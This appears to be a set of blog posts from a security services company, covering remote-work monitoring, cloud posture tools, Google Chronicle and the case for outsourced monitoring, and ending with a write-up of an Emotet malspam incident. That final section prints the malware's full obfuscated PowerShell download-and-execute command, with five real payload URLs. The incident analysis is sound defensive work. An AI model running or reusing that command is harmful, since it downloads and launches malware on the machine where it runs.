Cyberseer Annual Review
Published: 15th February
2020 was a year to remember for all the wrong reasons. Organisations were forced to immediately change to new ways of working and interacting with users and consumers.
In this report, Cyberseer reviews the issues of 2020:
- Cloud Transformation
- The Remote Workforce
- Cybercrime
- Supply Chain Security
During 2020, there was monumental change both within organisations and how consumers interact with these organisations. Within this paper we review how you can secure the cloud, the remote workforce (those users connecting to the cloud), how cybercrime has taken advantage of COVID-19 and the increased number of attacks on supply chain security. Complete the short form below to gain access to the full report.
Request Cyberseer Annual Review
Latest blogs
Discoveries made by the Cyberseer SOC
Why is visibility so important in today’s new norm of remote working.
What are Cloud Security and Posture Management tools?
Securing the Cloud Infrastructure: Native vs Cloud Control
Google Chronicle: The forward-thinking solution for threat hunting
Covid-19 Dramatically Changes Cyber Security Forever
Published: 6th November
The pandemic has set huge challenges for organisations worldwide. Overnight, organisations have had to rapidly transform just to function, and the demand on digital infrastructures have skyrocketed. Some organisations kept continuity by shifting business entirely online, creating demand for virtual processes and remote collaboration on a scale we have never seen.
Cyberseer have compiled some observations to consider below:
Lessons from Covid-19 have permanently changed society and to a lesser extent the way we think about cyber security. Our practices must evolve. By making the entire system easier to protect and manage, it is also much easier to recover.
By Elizabeth Gladen
Latest blogs
Discoveries made by the Cyberseer SOC
Why is visibility so important in today’s new norm of remote working.
What are Cloud Security and Posture Management tools?
Securing the Cloud Infrastructure: Native vs Cloud Control
Why is visibility so important in today’s new norm of remote working?
In the wake of COVID-19 we now have new breeds of remote workers. Businesses have always had a small proportion of remote workers however, pre COVID-19 these were normally field based personnel connecting to specific corporate applications and resources via VPN.
Along with the mass migration of workers to home environments, shortfalls in corporate laptops, PC’s and tablets with which to arm the expanded remote workforce means organisations are relaxing remote working policies to allow the use of personal devices (BYOD), with varying security postures, to access a much broader set of internal corporate applications than ever before. Now, more than ever, it is essential that companies have the ability to identify malicious activity originating from their remote access channels.
The majority of organisations already had varying degrees of remote access monitoring in place. However, these organisations are finding that they have to rapidly scale up their remote access infrastructures to cater for the new normal.
Rolling out functional SaaS services and VPN connectivity quickly often introduces multiple blind spots that existing solutions weren’t designed to address. This may be a result of using new technologies or simply that the vast increase in traffic has resulted in scaling issues with existing monitoring solutions.
When scaling out infrastructure and applications we need to ensure that we have visibility into these new environments as well as have capacity within existing systems. We therefore need to review and ensure that we ingest the appropriate data sources to provide insights into these environments, as well as ensuring that we have the capacity to store the additional raw data.
Finally, it is essential that you have an efficient SOC to actively monitor and respond to an increase in alerts.
Watch our webinar to learn more about visibility and click here to learn how ASPECT from Cyberseer can increase your SOC performance and reduce costs.
Published: 8th July
Latest blogs
Discoveries made by the Cyberseer SOC
Why is visibility so important in today’s new norm of remote working.
What are Cloud Security and Posture Management tools?
Securing the Cloud Infrastructure: Native vs Cloud Control
Google Chronicle: The forward-thinking solution for threat hunting
What are Cloud Security and Posture Management tools?
Published 24th June 2020
In 2019 Gartner published their report which recommended that security leaders invest in cloud security and posture management tools. The aim of CSPM tools is to identify and remediate the risks of misconfiguration, mismanagement, and mistakes.
Over the past year more Enterprises have started to focus on cloud security and understand that they need a dynamic cloud security solution but are unaware of what tool to look for in a tool.
Within the cloud security space, there are Cloud Access Security Brokers (CASBs), Cloud Workload Protection Platforms (CWPPs), and Cloud Security Posture Management (CSPM) tools. While these tools offer an over-lapping set of capabilities to each other, they do not provide all the capabilities required to perform the job of the other.
A CASB is placed between the customer and the cloud service provider to enforce security, compliance, and governance policies for cloud applications. It focuses on SaaS security and gives visibility and control on the use of SaaS applications such as Office 365, Salesforce, etc.
A CWPP solution is primarily used to secure server workloads in public cloud IaaS environments. A CWPP commonly offer workload configuration and vulnerability management, network segmentation, workload behavior monitoring, visibility, system integrity monitoring and container security risk mitigation.
A CSPM tool was earlier referred to as a Cloud Infrastructure Security Posture Assessment (CISPA) tool when their capabilities were limited to reporting as against the current ability of a security management automation tool that addresses misconfiguration issues.
With the increasing use of cloud services and the growing cloud security concerns, vulnerabilities must be reduced. By 2022 Gartner has predicted that most of the cloud security failures will be the result of an organisation’s mistake, i.e., misconfiguration in the cloud.
A single misconfiguration has the power to expose several thousands of systems and sensitive data to the public internet.
Misconfiguration
Most of the cloud security breaches that we read about in 2019 had one thing in common “misconfiguration”. Some of the easiest misconfigurations exposed several hundred million personal data and records.
A misconfiguration occurs when computing assets are set up incorrectly, often leaving them vulnerable to malicious activity.
Benefits of CSPM
- Automated security assessment; monitoring; reporting; and management
- Security best practice enforcement
- Prevent configuration vulnerability
- Cloud asset inventory
- Visibility into cloud usage and security events
- Enforce prebuilt security standards and regulatory compliances
About C3M Cloud Control
C3M Cloud Control is a CSPM that also has some CWPP capabilities. The platform offers:
- Cloud asset inventory
- Automated cloud security assessment
- Real-time alerting and reporting
- Automated violation remediation
- Security best practice enforcement
- Compliance assurance with 8+ security standards and regulations
- Third-party integrations such as Slack, Splunk, Jira, PagerDuty, Service Now, Amazon SNS etc
- Identity and Access Management for Cloud
- CQL to query about the cloud infrastructure
- Audit logs
Latest blogs
Discoveries made by the Cyberseer SOC
Why is visibility so important in today’s new norm of remote working.
What are Cloud Security and Posture Management tools?
Securing the Cloud Infrastructure: Native vs Cloud Control
Google Chronicle: The forward-thinking solution for threat hunting
Securing Cloud Infrastructure: Native vs Cloud Control
As the number of enterprises moving to the cloud exponentially grows, there has been an inevitable rise in cloud security breaches. Despite this rise enterprises still fail to understand the need to implement a future proof strategy securing cloud infrastructure and implement a cloud security solution. At Cyberseer we educate our clients as most organisations perceive that:
- Cloud is secure by default so why would I use Cloud Control?
- I already have native security tools that my cloud service provider offers me, so why should I invest in a third-party tool?
Here we answer these two common questions which may seem fairly simple and straightforward on the surface:
Who is responsible for cloud security?
It is highly important that the enterprises adopting the cloud are familiar with the shared responsibility of security that is a standard across all the cloud providers. Cloud providers are responsible for security “of” the cloud while security “in” the cloud is the responsibility of the enterprise.
The cloud provider’s responsibilities can be summed up as follows:
- Protecting the cloud provider’s physical premises, software, network, and hardware.
- Server-level security i.e. protection against attacks that would affect the entire cloud server
- Ensuring their systems are always updated and have the necessary patches in place
- Providing business continuity services and contingencies in case of an accident or system failure
The customer is responsible for the following:
- Ensuring systems are properly configured
- Security of traffic coming in and out of the server
- Maintenance and protection of all platforms and applications running on the cloud
- Patching their OS and applications
- Configuring their OS, databases, and applications
- Managing and handling all matters related to login, authentication and access permissions
- Protection of the data that enters and exits the cloud service
- Controlling what data is loaded to the cloud and ensuring an appropriate level of encryption
- Enforcing security best practices for the cloud
The cloud provider protects the underlying infrastructure of the cloud from vulnerabilities, intrusions, fraud, and abuse, and provide its customers with adequate security capabilities.
However, it is the customer’s responsibility to ensure that they make the most of these security capabilities. Eg: In the case of AWS, it is the customer’s responsibility to enforce necessary access control policies using AWS IAM, configure Security Groups, enable CloudTrial, etc.
What about native tools?
Cloud service providers all offer their own native security tools that can easily be configured and deployed. These tools normally reside within the same console as the infrastructure services and hence the tool can be easily used.
For organisations with very minimal security aspirations, such tools works perfectly. However, for an organisation that has greater security requirements and operates in a regulated industry such tools are not effective.
Cloud providers native tools do not offer the depth of coverage that Cloud Control offers. What’s more the portability across multiple clouds is impossible meaning a separate interface and configuration per cloud provider is required. By using Cloud Control, a consistent policy can be rolled out across multiple cloud providers using a single interface.
Below is a comparison between the native security tools offered by the cloud service providers and Cloud Control
If you would like to know more about any of our services then please get in touch with us.
Published 23rd June
Google Chronicle: The forward-thinking solution for threat hunting
Chronicle is a new threat hunting platform, developed by Google. Leveraging Google, Cloud and Threat Feed technologies it provides analysts the ability to deep dive into accessible and enriched logs.
It gives companies 12 months of hot storage with sub-second searchability. It gives Google Search to the security industry. Basic SoC queries such as “How many devices accessed this IP address in the past 12 months” can now be answered in the click of your fingers and this is something the cybersecurity industry hasn’t really seen before.
Nowhere to hide for malicious actors
While that is a feat in itself Chronicle takes this further; it takes IOC (Indicator of Compromise) feeds from multiple sources (including Government agencies and VirusTotal) and can apply this to data it ingests.
All ingested data gets indexed so Chronicle will automatically retro-search the indexed data every time it sees a new IOC.
This means there’s truly nowhere to hide for malicious actors; the moment they are on the radar an analyst can quickly pivot off this information to provide a detailed timeline of when an environment became first infected and all the other devices involved.
This provides you 100% coverage from those ‘low and slow’ type of infections. Chronicle presents this data in such a way that the analyst gets a comprehensive view of what happened before and after, from all log sources ingested into the platform.
Well thought out visualisation of this data makes it easy to identify interesting patterns of behaviours:
In the screenshot above it’s clear to see all that in action. In one simple view, we can see a rare domain, the process that interacted with it and then clear beaconing activity; streamlining an analyst workflow. As for what data can be consumed by the platform, Chronicle made it clear that it just needs to be a security-related log.
All Chronicle needs to do is index the data and if it can’t do that straight away the Chronicle team will support the end user to get their data ingested on to the platform. This functionality is then added to the product, meaning everybody gets the benefit. Even in its infancy Chronicle can take in DHCP, DNS, Proxy and EDR.
The impressive speed allows analysts to search petabytes of data in seconds. The impressiveness isn’t just limited to data search but extends to the ingestion too as Chronicle can rapidly scale out dynamically across Google’s existing cloud platform. Log collection is simple too, adopting a containerised approach with multiple ingestion methods.
On a techie front Chronicle are solving ingestion issues commonly seen in SIEM projects by use of UDM (Unified Data Model). This is a predefined list of Chronicle fields to help Chronicle best understand the different data types it’s ingesting. Having such clear standards fields of ingested data has allowed Chronicle to work hard on it’s biggest playing card; YARA-L.
YARA-L … and why we’re excited!
‘YARA’ may be a term familiar to the security community. It’s a known standard for writing detection rules in. The key word here being community. Understanding the rule syntax and not having to learn anything new means that SoC teams and MSSP’s will be able to put effective detection rules straight in with very little modification. Chronicle has taken this one step further by actively working with the security community to provide conversion tools from other rule formats.
Why is this important? A community rule to identify a new zero-day attack could be applied in a matter of minutes. You then only need to add a couple of seconds to this to search your past 12 months of data for any indicators of compromise. Streamlining at a new level.
Familiar syntax for rules also covers the other SIEM problem … noise. This makes it easier for an analyst to change conditions of rules so that there is more accurate detection within rules. Chronicle are constantly improving the syntax too, with planned additions for device lists within rules, and different network groups. This could be great for those devices that you want extra insight and monitoring of.
While we’re talking security, if you’ve already got existing solutions, Chronicle can also consume feeds from these giving businesses the freedom to migrate to the cloud or augment with their existing SIEMs.
What does this mean?
12 months minimum, sub-second query responses across entire log data sets, clean informative presentation of data will all associated contextual data on hand. All scalable and readily available in the cloud.
De stress your security staff with an advanced SOC?
Published: 9th February 2020
Many factors affect the ability for and organisation to remain secure, including an exponential increase in log data due to the adoption of cloud operating models, endpoint monitoring and more reliance being placed on online applications.
The need to ensure that your team are fully up to date on the latest threat hunting techniques, cyber exploits and vulnerabilities is critical.
To help put this challenge into perspective; it’s been estimated that 90% of all log data globally was generated within the last 24 months.
Utilising this log data effectively to your advantage and identifying malicious activity early is your biggest challenge and best defence against a damaging cyber-attack.
Cyberseer utilise Machine learning technologies from leading security vendors combined with automation and orchestration from Cyberseer’s ASPECT platform (Automated Security Platform Enriching Cyber Threats).
ASPECT enhances and contextualises data and alerts that are notified from monitored devices.
To achieve this ASPECT is able to continually automate and orchestrate security data to provide an enriched contextualised view of security alerts and associated intelligence that enable our analysts to quickly identify and manage threats for your organisation.
The utilisation of ASPECT and our dedicated forensic analysts ensures that, as greater reliance on cloud technologies and disparate operating models becomes more complex, the increased data volumes generated as a result don’t create gaps in visibility.
8 Reasons for Detecting & Investigating Security Incidents with a Managed Security Service Provider
The threat landscape is continually evolving affecting all types of business that embrace and rely on technology to continue their day to day operations.
The explosion of cloud-based applications and services coupled with initiatives such as Bring Your Own Device (BYOD) present significant security challenges to the IT Security Department and keep many CISO’s awake at night.
The below graphic has never had more accurate than in today’s digital, always-on world.
What are the concerns that contribute to making the role of a CISO almost untenable?
- Increase in disparate log sources that make it challenging for some Analysts to see beyond the noise;
- Inability to utilise effective contextual enrichment and situational awareness of the current climate;
- Incomplete enterprise visibility with partial monitoring coverage across some areas;
- A weak approach to threat hunting to surface anomalous activity earlier in its lifecycle;
Here are 8 critical reasons supporting why utilising an MSSPs can empower your security operations with the people, processes and technology required to take control and reduce dwell time to a minimum for your organisation.
Help ensure your CISO gets some rest and you don’t suffer the consequences of a damaging cyber breach:
1. RISING COST OF BREACHES
(Ponemon Institute, 2017 Cost of Data Breach Study).
Immediate disruption is significant! Nearly one-third of data breaches suffered by companies around the world have resulted in someone losing their job, according to a 2018 Kaspersky Lab study.
Not to mention the reputational damage, loss of competitive advantage, erosion of customer confidence, plus higher insurance premiums and regulatory fines.
With rising costs of a cyber-attack, it’s now a boardroom concern.
Utilising an MSSP to proactively monitor your enterprise can help thwart and thus significantly reduce the impact of any attacks targeting your enterprise, be it from internal or external sources.
2. GDPR IMPLICATIONS
With the introduction of the EU’s General Data Protection Regulation (GDPR), it’s vital for businesses to pay even closer attention to their data protection strategies.
Organisations are at risk of significant fines if they fail to demonstrate appropriate controls and/or fail to report security breaches to a relevant authority within 72 hours.
To execute notifications of data breaches, organisations must invest in a holistic cybersecurity program.
The need for improved visibility of data and capability to detect, respond and report breaches is now greater than ever.
An MSSP enables your organisation to align with the control mandates within GDPR and ensure that the risk of financial penalties is reduced significantly.
3. PROTECTING AGAINST MALWARE
It’s important for appropriate controls, such as behaviour-based security solutions to be deployed to accurately detect and respond to attacks before they cause significant damage to your assets and affect your reputation.
Cyberseer utilises behaviour-based endpoint monitoring technology and machine learning to surface anomalous activity swiftly.
4. IMPROVED MONITORING, DETECTION AND RESPONDING TO THREATS
(Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2019: Statistical Release).
The threat of a cyber-attack is widespread and real in the UK. It’s now a case of when not if you’ll be targeted. Cybersecurity and how to protect the business are a priority issue.
Cyberseer can challenge and improve your security strategy, protecting your organisation’s assets, customer data and third-parties’ integrations from compromise.
5. MANAGE CLOUD SECURITY
As more and more organisations adopt software as a service and cloud-first initiatives, attackers are following the data.
As a result; Attacks against cloud providers, telecoms, and other organisations with access to large amounts of data have increased.
Cyberseer solutions incorporate log data from your cloud deployments/applications and profile this data alongside your traditional on-premise log data ensuring that complete visibility of your enterprise end to end is achieved irrespective of its location.
6. IT’S BEEN CHALLENGING FOR YOU TO FIND & RETAIN TALENT.
(Cybersecurity Ventures, Cybersecurity Job Report 2018-2021).
There is a critical talent shortage, and this alone can be a challenge. With a current cybersecurity skills shortage of 2.9 million employees, it’s no wonder that cybersecurity salaries continue to rise.
Utilising an MSSP can help to reduce the operational risk as well as ensure an unfilled vacancy doesn’t affect your front-line defences.
Cyberseer’s approach involves hiring and retaining Tier 3 Forensic Analysts as part of our managed security service team.
7. DECREASE UNNECESSARY COSTS & WASTE WHILST INCREASING EFFICIENCY.
Modern cybersecurity programs are costly to build. It can be expensive to invest in the best-in-class cybersecurity tools alongside costs for the training required for staff to use the new tools.
MSSPs enables organisations to replace large, capital expenditures associated with thus investment with predictable, fixed ongoing operational costs.
Cyberseer adopts a ‘do more with less’ approach utilising next-generation technologies to reduce alert fatigue whilst embracing industry leading forensic analysts to threat hunt, triage and investigate; all encapsulated within an easy to understand user-based license model inclusive of unlimited logging.
8. LACK OF RESOURCES TO MONITOR YOUR SECURITY AT ALL HOURS.
Providing the capability to effectively monitor your enterprise around the clock can become a costly exercise. As a result, many organisations have yielded on this in favour of a 9×5 approach to monitoring.
This presents potential security as adversaries can attack at any time and are not considerate of your active monitoring hours.
Cyberseer provides a 24 x 7 priority threat alerting service as part of the deployed capability.
This service autonomously notifies our analysts of anomalous activity and the Cyberseer enrichment engine starts building up threat intelligence information against individual events within the user or entity timeline to save the analyst time collecting and verifying the data.
This greatly improves the ‘Time to Respond’ (TTR) metrics as well as controlling the volume of human effort that’s required to triage each threat with the same level of accuracy.
PARTNERING WITH AN MSSP LIKE CYBERSEER DELIVERS THE FOLLOWING BENEFITS:
- Superior protection:
- with access to the brightest minds and security expertise.
- 24/7 threat monitoring & alerting.
- access to the best-in-class cybersecurity technology.
- Focus in business;
- Cost savings;
- Peace of mind;
- Virtual extension of your IT Security team who are on hand to support you.
- Superior protection.
Many factors affect the ability for and organisation to remain secure, including an exponential increase in log data due to the adoption of cloud operating models, endpoint monitoring and more reliance being placed on online applications.
The need to ensure that your team are fully up to date on the latest threat hunting techniques, cyber exploits and vulnerabilities is critical.
To help put this challenge into perspective; it’s been estimated that 90% of all log data globally was generated within the last 24 months.
Utilising this log data effectively to your advantage and identifying malicious activity early is your biggest challenge and best defence against a damaging cyber-attack.
Cyberseer utilise Machine learning technologies from leading security vendors combined with automation and orchestration from Cyberseer’s ASPECT platform (Automated Security Platform Enriching Cyber Threats).
ASPECT enhances and contextualises data and alerts that are notified from monitored devices.
To achieve this ASPECT is able to continually automate and orchestrate security data to provide an enriched contextualised view of security alerts and associated intelligence that enable our analysts to quickly identify and manage threats for your organisation.
The utilisation of ASPECT and our dedicated forensic analysts ensures that, as greater reliance on cloud technologies and disparate operating models becomes more complex, the increased data volumes generated as a result don’t create gaps in visibility.
Detect Emotet Malspam
Introduction to Emotet Malspam
Recently, one of Cyberseer’s customer’s was hit with a “Malspam” campaign aiming to plant the Emotet malware within its network.
The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.
What is Emotet?
Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1] with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine.
Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL.
Upon opening the malicious document, a combination of obfuscated VBA scripts / macros instructs the target machine to download a remote payload consisting of a number of different modules.
Figure 1 – Emotet Activity [2]
Previously downloaded payloads have included:
- Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
- Email client infostealer – Steals e-mail credentials from email client software.
- Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
- PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.
Detection of Emotet
Figure 2 – Emotet Infection Chain [3]
With the first stage of the attack involving an e-mail attachment, it makes sense to start off by analysing the Word document that landed in the victim’s inboxes.
As stated in the previous section, when a user opens the document and enables macros a VBA scrip runs, we then see the following Powershell command being run to pull files from remote locations:
powershell.exe powershell $fbq=’IkL’;$qdr=‘https://danzarspiritandtruth.com/J7B5TiAIp@https://littlepeonyphotos.ru/jPGDyvIm@https://iuyouth.hcmiu.edu.vn/mVayv0I7S@https://exploraverde.co/mmR4TaGu8@https://turkaline.com/zGiFH0X‘.Split(‘@’);$siF=([System.IO.Path]::GetTempPath()+’\zEl.exe’);$wjS =New-Object -com ‘msxml2.xmlhttp’;$TMS = New-Object -com ‘adodb.stream’;foreach($PJC in $qdr){try{$wjS.open(‘GET’,$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}
The command contains 5 hardcoded URLs serving a number of different payloads. Connections to these URLs is how the incident was first identified by Cyberseer analysts.
As soon as the URL was connected to, signatureless models first breached for connections to the domains and then the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment
Figure 3 – Initial connections
Pivoting into the network logs, a quick investigation of the external domains reveals 5 users had become a victim of this attack –
Figure 4 – Devices associated
Drilling deeper into the connections from one of the associated devices and looking at a PCAP we can confirm the download of the malicious payloads:
Figure 5 – Executable seen in PCAP
Carving the payloads from the PCAP we get the following exe files –
dd975e74625cdd2959005dc9043f4c26
https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection
9a2c288270459e95d915b8eaee7f65da
https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection
Cyberseer Analysts were able to rapidly investigate the file and contact the client. Luckily the downloaded executables were unable to execute due to permissions, allowing for them to be successfully quarantined and remediated before a further compromise could occur.
Conclusion
This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, new unknown threats. A machine-learnt behavioural approach to security is able to detect threats ahead of other traditional solutions, allowing a faster response to potential breaches.
Security technologies that require signatures and blacklists to be updated will always be one step behind the attackers and never be able to detect new unknown threats in real-time.
Cyberseer’s threat detection and analysis managed security service bridges the gaps in an organisations cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation.
Understanding your organisation’s threat score and dealing with live issues early, decreases incident response times and significantly reduces the risk of cyber damage.